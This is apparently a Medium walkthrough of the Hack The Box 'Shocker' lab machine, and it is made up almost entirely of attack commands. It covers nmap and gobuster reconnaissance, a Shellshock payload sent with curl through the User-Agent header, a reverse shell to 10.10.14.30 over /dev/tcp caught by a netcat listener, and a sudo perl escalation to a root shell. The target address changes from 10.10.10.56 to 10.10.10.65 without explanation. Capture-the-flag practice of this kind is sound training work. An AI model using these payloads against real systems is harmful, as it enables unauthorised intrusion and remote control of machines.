Hack The Box (HTB) — Shocker — Walkthrough

Introduction

Reconnaissance

Scanning

nmap -Pn 10.10.10.56
nmap -p 80,2222 10.10.10.56 -sV -sC

Enumeration

gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt -t 30
gobuster dir -u http://10.10.10.56/cgi-bin/ -x .php,.html,.txt,.sh -w /usr/share/wordlists/dirb/common.txt -t 30
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.65/cgi-bin/user.sh

Exploitation

nc -lvnp 443
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -i >& /dev/tcp/10.10.14.30/443 0>&1" http://10.10.10.65/cgi-bin/user.sh

Privilege Escalation

sudo perl -e 'exec "/bin/sh";'

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store